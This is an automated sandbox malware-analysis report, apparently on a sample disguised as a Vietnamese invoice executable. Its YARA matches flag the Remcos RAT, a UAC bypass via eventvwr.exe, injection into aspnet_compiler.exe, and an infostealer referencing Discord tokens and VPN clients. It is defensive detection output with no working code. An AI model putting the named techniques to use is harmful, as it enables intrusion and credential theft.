Source: Yara match File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.520253260.0000000001307000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe PID: 3988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: aspnet_compiler.exe PID: 3660, type: MEMORYSTR
Source: Yara match File source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: aspnet_compiler.exe Process created: 50

System Summary

Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe PID: 3988, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: aspnet_compiler.exe PID: 3660, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Code function: 0_2_00B4C114 0_2_00B4C114
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Code function: 0_2_00B4E558 0_2_00B4E558
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Code function: 0_2_00B4E548 0_2_00B4E548
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Code function: 0_2_077E5FB0 0_2_077E5FB0
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Code function: 0_2_077EB620 0_2_077EB620
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Code function: 0_2_077E9084 0_2_077E9084
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Code function: 0_2_077E5FA0 0_2_077E5FA0
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Code function: 0_2_077EB60F 0_2_077EB60F
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Code function: 0_2_077EB5C3 0_2_077EB5C3
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Code function: 0_2_077E63CF 0_2_077E63CF
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Code function: 0_2_077EA244 0_2_077EA244
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Code function: 0_2_077E5068 0_2_077E5068
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Code function: 0_2_077E5059 0_2_077E5059
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Code function: 0_2_077E0040 0_2_077E0040
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Code function: 0_2_077E003E 0_2_077E003E
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Code function: 0_2_078C83A0 0_2_078C83A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_10017194 12_2_10017194
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0044B040 14_2_0044B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0043610D 14_2_0043610D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_00447310 14_2_00447310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0044A490 14_2_0044A490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0040755A 14_2_0040755A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0043C560 14_2_0043C560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0044B610 14_2_0044B610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0044D6C0 14_2_0044D6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_004476F0 14_2_004476F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0044B870 14_2_0044B870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0044081D 14_2_0044081D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_00414957 14_2_00414957
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_004079EE 14_2_004079EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_00407AEB 14_2_00407AEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0044AA80 14_2_0044AA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_00412AA9 14_2_00412AA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_00404B74 14_2_00404B74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_00404B03 14_2_00404B03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0044BBD8 14_2_0044BBD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_00404BE5 14_2_00404BE5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_00404C76 14_2_00404C76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_00415CFE 14_2_00415CFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_00416D72 14_2_00416D72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_00446D30 14_2_00446D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_00446D8B 14_2_00446D8B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_00406E8F 14_2_00406E8F
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe PID: 3988, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
